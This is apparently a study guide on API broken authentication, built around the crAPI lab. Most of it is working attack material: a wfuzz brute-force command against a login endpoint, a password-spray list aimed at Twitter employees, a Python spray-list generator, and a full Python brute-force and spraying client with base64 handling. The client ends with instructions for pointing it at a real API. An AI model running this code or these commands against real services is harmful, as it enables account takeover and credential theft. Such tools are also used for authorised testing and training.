Broken Authentication

API2-Broken Authentication

Authentication Bypass: Password Brute-Force Attacks and Password Spraying

Password Brute-Force Attacks:

Tools and Wordlists:

  • Mentalist App: (https://github.com/sc0tfree/mentalist)

  • Common User Passwords Profiler (CUPP): (https://github.com/Mebus/cupp)

  • Wordlist: A popular example is rockyou.txt. Kali Linux ships it compressed at /usr/share/wordlists/rockyou.txt.gz; decompress it (root privileges may be required for that directory) with:

      gzip -d /usr/share/wordlists/rockyou.txt.gz

Performing a Brute-Force Attack with Wfuzz:

  1. Preparation:

    • Unzip the wordlist (rockyou.txt) if needed.

  2. Using Wfuzz:

    • Check the Wfuzz help menu to understand available options:

      wfuzz --help
    • Important options for API testing include:

      • Headers option (-H)

      • Hide responses options (--hc, --hl, --hw, --hh)

      • POST body requests (-d)

  3. Crafting the Wfuzz Attack:

    • Specify the content-type headers for the API (e.g., Content-Type: application/json for crAPI).

    • Define the POST body for the login endpoint, where FUZZ is the attack position:

      wfuzz -d '{"email":"a@email.com","password":"FUZZ"}' -H 'Content-Type: application/json' -z file,/usr/share/wordlists/rockyou.txt -u http://127.0.0.1:8888/identity/api/auth/login --hc 405
    • In this example, the attack tests each wordlist entry as the password for a@email.com against the login endpoint, and the uninteresting responses (status code 405) are hidden. Choose the code to hide from observation, not assumption: send one request with an obviously wrong password first, note how the API answers a failed login, and hide that response.

  4. Reviewing Results:

    • Analyze the results, looking for valid passwords. Successful attempts will typically show responses with a 200 status code. Compare the response length and word count as well (the Lines/Words/Chars columns), because some APIs return 200 for failed logins too and signal the failure only in the body.

Password Spraying:

Password Spraying Strategies:

  1. Simple Passwords:

    • Use easily guessable passwords that meet basic requirements (e.g., QWER!@#$, Password1!).

  2. Target-Related Passwords:

    • Create passwords related to the target, including a capitalized letter, a number, details about the organization, and a symbol.

    • Example password-spraying list for Twitter employees:

      Summer2022!
      Spring2022!
      QWER!@#
      March212006!
      July152006!
      Twitter@2022
      JPD1976!
      Dorsey@2022
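The target-related strategy above (a capitalized word, a number, an organization detail, and a symbol) can be turned into a generator. This is an added example, not code from the original page; the organization, names and years passed in are constructed inputs standing in for what reconnaissance would supply, and the complexity rule in meets_policy is an assumed, typical corporate policy:

```python
import re
from typing import Iterable, List, Sequence

SEASONS = ["Spring", "Summer", "Autumn", "Winter"]
SYMBOLS = ["!", "@", "#", "$"]


def meets_policy(pw: str, min_len: int = 8) -> bool:
    """Assumed typical complexity rule: minimum length plus upper, lower, digit
    and symbol. Candidates that cannot pass the policy only waste attempts."""
    return (len(pw) >= min_len
            and re.search(r"[A-Z]", pw) is not None
            and re.search(r"[a-z]", pw) is not None
            and re.search(r"\d", pw) is not None
            and re.search(r"[^A-Za-z0-9]", pw) is not None)


def build_spray_list(org: str, years: Iterable[int], people: Sequence[str] = (),
                     symbols: Sequence[str] = SYMBOLS, min_len: int = 8) -> List[str]:
    """Ordered, de-duplicated spray candidates built from the target's details:
    Season+Year+Symbol, Org/Name+Symbol+Year and Org/Name+Year+Symbol."""
    seen, out = set(), []

    def add(pw: str) -> None:
        if pw not in seen and meets_policy(pw, min_len):
            seen.add(pw)
            out.append(pw)

    # Capitalized so each candidate carries the upper-case letter policies demand.
    terms = [org.capitalize()] + [p.capitalize() for p in people]
    for year in years:
        for season in SEASONS:
            for sym in symbols:
                add(f"{season}{year}{sym}")        # Summer2022!
        for term in terms:
            for sym in symbols:
                add(f"{term}{sym}{year}")          # Twitter@2022, Dorsey@2022
                add(f"{term}{year}{sym}")          # Twitter2022!
    return out


if __name__ == "__main__":
    # Constructed inputs mirroring the list above.
    for candidate in build_spray_list("twitter", [2022], people=["dorsey"]):
        print(candidate)
```

Keyboard-walk entries such as QWER!@# fail the length check and are dropped, which is the point: spray lists are short by design, because each password is sent once to every user and every extra failure counts toward the account lockout threshold, so order the candidates by likelihood and pause between rounds.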

Maximizing User List:

  • The key to password spraying is to maximize the user list, increasing the chances of compromising a user account with a weak password.

  • Build a user list during reconnaissance or by exploiting vulnerabilities like excessive data exposure.

Note on Base64 Encoding:

  • Some APIs may base64-encode authentication payloads.

  • If an API expects base64-encoded payloads, adjust fuzzing attacks so each payload is base64-encoded before it is sent, for example with a Burp Suite Intruder payload-processing rule, and decode the responses the same way.

  • Base64 is an encoding, not encryption: anyone can reverse it, so it adds no security. APIs usually use it only so the payload survives transport or matches the format the backend compares against.
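The pieces above (the Wfuzz brute-force procedure, password spraying, and the base64 note) combined in one small client. This is an added example, not code from the original page or from crAPI: it assumes the login URL and JSON body from the Wfuzz command above, takes a pluggable transport so it runs offline, and the in-memory API, its users and its token are constructed stand-ins for a real target. It records a failure baseline first, the manual step behind picking Wfuzz's --hc/--hh values, and flags a hit when status or body length departs from it:

```python
import base64
import json
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List, Tuple

# Assumed endpoint: the one the Wfuzz example above targets.
LOGIN_URL = "http://127.0.0.1:8888/identity/api/auth/login"


@dataclass(frozen=True)
class Resp:
    status: int
    body: bytes

    @property
    def length(self) -> int:
        return len(self.body)


# A transport takes (url, body, headers) and returns a Resp. A real one would
# wrap requests.post; the constructed one at the bottom runs offline.
Transport = Callable[[str, bytes, Dict[str, str]], Resp]


def build_payload(email: str, password: str, b64: bool = False) -> bytes:
    """JSON login body, optionally base64-wrapped for APIs that expect it.
    Base64 is reversible by anyone: it is an encoding step, not a protection."""
    raw = json.dumps({"email": email, "password": password}).encode()
    return base64.b64encode(raw) if b64 else raw


def login(send: Transport, email: str, password: str, b64: bool = False) -> Resp:
    headers = {"Content-Type": "application/json"}
    return send(LOGIN_URL, build_payload(email, password, b64), headers)


def baseline(send: Transport, email: str, b64: bool = False) -> Resp:
    """One deliberately wrong password, to record what a failed login looks like."""
    return login(send, email, "not-the-password-" + "x" * 24, b64)


def looks_like_success(resp: Resp, base: Resp) -> bool:
    # A hit differs from the failure baseline in status OR in length. Status alone
    # misses APIs that answer 200 to every login and report failure in the body.
    return resp.status != base.status or resp.length != base.length


def brute_force(send: Transport, email: str, passwords: Iterable[str],
                b64: bool = False) -> List[Tuple[str, str, int]]:
    """Many passwords against one account (the FUZZ position in the Wfuzz command)."""
    base = baseline(send, email, b64)
    hits = []
    for pw in passwords:
        r = login(send, email, pw, b64)
        if looks_like_success(r, base):
            hits.append((email, pw, r.status))
    return hits


def spray(send: Transport, emails: Iterable[str], passwords: Iterable[str],
          b64: bool = False) -> List[Tuple[str, str, int]]:
    """One password across every account per round: each account sees only one
    failure per round, so lockout thresholds are far less likely to trip."""
    emails = list(emails)
    bases = {e: baseline(send, e, b64) for e in emails}
    hits = []
    for pw in passwords:            # outer loop = password, inner loop = users
        for e in emails:
            r = login(send, e, pw, b64)
            if looks_like_success(r, bases[e]):
                hits.append((e, pw, r.status))
    return hits


# --- constructed in-memory API so the example runs offline -------------------
FAKE_USERS = {"a@email.com": "Summer2022!", "b@email.com": "Password1!"}


def make_fake_api(b64: bool = False, always_200: bool = False) -> Transport:
    """Stand-in target. always_200 models an API that returns 200 on failure
    too, so hits are distinguishable only by body length."""
    def send(url: str, body: bytes, headers: Dict[str, str]) -> Resp:
        assert url == LOGIN_URL and headers["Content-Type"] == "application/json"
        creds = json.loads(base64.b64decode(body) if b64 else body)
        if FAKE_USERS.get(creds["email"]) == creds["password"]:
            return Resp(200, b'{"token":"constructed.example.token"}')
        return Resp(200 if always_200 else 401, b'{"error":"Invalid Credentials"}')
    return send


if __name__ == "__main__":
    words = ["123456", "password", "Summer2022!", "Password1!"]
    print(brute_force(make_fake_api(), "a@email.com", words))
    print(spray(make_fake_api(b64=True, always_200=True), FAKE_USERS, words, b64=True))
```

To point this at a real API, replace make_fake_api with a transport that calls requests.post(url, data=body, headers=headers) and maps the response onto Resp; everything else, including the baseline check, stays the same.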
